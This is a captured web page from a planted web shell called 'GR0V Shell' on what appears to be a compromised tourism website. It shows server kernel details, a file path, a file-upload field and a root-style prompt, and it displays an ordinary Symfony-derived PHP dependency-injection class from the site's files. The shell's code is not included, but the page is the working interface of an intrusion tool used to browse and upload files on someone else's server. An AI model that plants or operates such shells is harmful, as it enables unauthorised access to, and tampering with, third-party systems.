? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/libraries/rokcommon/RokCommon/Service/Container/
File Upload :
Current File : /home/admin/public_html/old/libraries/rokcommon/RokCommon/Service/Container/AbstractDumper.php

<?php

/*
 * This file is part of the symfony framework.
 *
 * (c) Fabien Potencier <fabien.potencier@symfony-project.com>
 *
 * This source file is subject to the MIT license that is bundled
 * with this source code in the file LICENSE.
 */

/**
 * RokCommon_Service_Container_AbstractDumper is the abstract class for all built-in dumpers.
 *
 * @package    symfony
 * @subpackage dependency_injection
 * @author     Fabien Potencier <fabien.potencier@symfony-project.com>
 * @version    SVN: $Id: AbstractDumper.php 10831 2013-05-29 19:32:17Z btowles $
 */
abstract class RokCommon_Service_Container_AbstractDumper implements RokCommon_Service_Container_Dumper
{
  protected $container;

  /**
   * Constructor.
   *
   * @param RokCommon_Service_Container_Builder $container The service container to dump
   */
  public function __construct(RokCommon_Service_Container_Builder $container)
  {
    $this->container = $container;
  }

  /**
   * Dumps the service container.
   *
   * @param  array  $options An array of options
   *
   * @return string The representation of the service container
   */
  public function dump(array $options = array())
  {
    throw new LogicException('You must extend this abstract class and implement the dump() method.');
  }
}

T1KUS90T
  root-grov@210.1.60.28:~$